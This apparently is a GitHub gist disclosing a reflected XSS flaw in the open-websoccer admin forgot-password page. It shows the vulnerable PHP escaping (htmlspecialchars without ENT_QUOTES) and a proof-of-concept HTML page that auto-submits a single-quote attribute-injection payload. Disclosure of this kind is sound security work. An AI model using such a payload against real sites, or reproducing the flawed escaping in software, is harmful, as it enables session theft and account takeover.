Skip to content

Instantly share code, notes, and snippets.

@LioTree
Created May 3, 2024 08:47
Show Gist options
  • Save LioTree/b0cab762151c8a8e105dcb88db1b4f85 to your computer and use it in GitHub Desktop.
Save LioTree/b0cab762151c8a8e105dcb88db1b4f85 to your computer and use it in GitHub Desktop.
open-websoccer xss

vendor: ihofmann/open-websoccer: A PHP based online football/soccer manager game. (github.com)

version: <= 5.2.3

php version: 5.x

An XSS vulnerability (Cross site Scripting) (CWE-79) is in websoccer/admin/forgot-password.php. At line 129, The $_POST['inputEmail'] is inserted into the value attribute of <input> tag and is escaped by escapeOutput, which is actually employs htmlspecialchars($message, ENT_COMPAT, 'UTF-8') at line 30 of websoccer/admin/functions.inc.php. However, htmlspecialchars doesn't escape ' without the ENT_QUOTES flag. Therefore, an attacker can still exploit this by using ' to break out of value attribute and inject other attributes within malicious Javascript code. This allows attackers to obtain cookies of administrator and other users and fake their login using obtained cookies.

$inputEmail = (isset($_POST['inputEmail'])) ? trim($_POST['inputEmail']) : FALSE;
......
<input type='email' name='inputEmail' id='inputEmail' placeholder='E-Mail' value='<?php echo escapeOutput($inputEmail); ?>'>
/**
 * Escapes for HTML output. Uses <code>htmlspecialchars</code> (UTF-8).
 * 
 * @param string $message message string to escape.
 * @return string escaped input string, ready for secure HTML output.
 */
function escapeOutput($message) {
	return htmlspecialchars($message, ENT_COMPAT, 'UTF-8');
}

The POC is as follows:

Create a malicious webpage designed to inject JavaScript code into the target page(http://xxxx/admin/forgot-password.php):

<html>
<head>
    <script>
        window.onload = function() {
            document.getElementById("postsubmit").click();
        }
    </script>
</head>

<body>
    <form method="post" action="http://localhost/open-websoccer/websoccer/admin/forgot-password.php">
        <input id="xssr_in" type="text" style="display:none" name="inputEmail" value="' onfocus=alert(1) autofocus '" />
        <div style="display:none;"><input id="postsubmit" type="submit" name="submit" value="submit" /></div>
    </form>
</body>
</html>

When the victim visits this malicious page, the javascript code will be executed under the target page.

open-websoccer

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment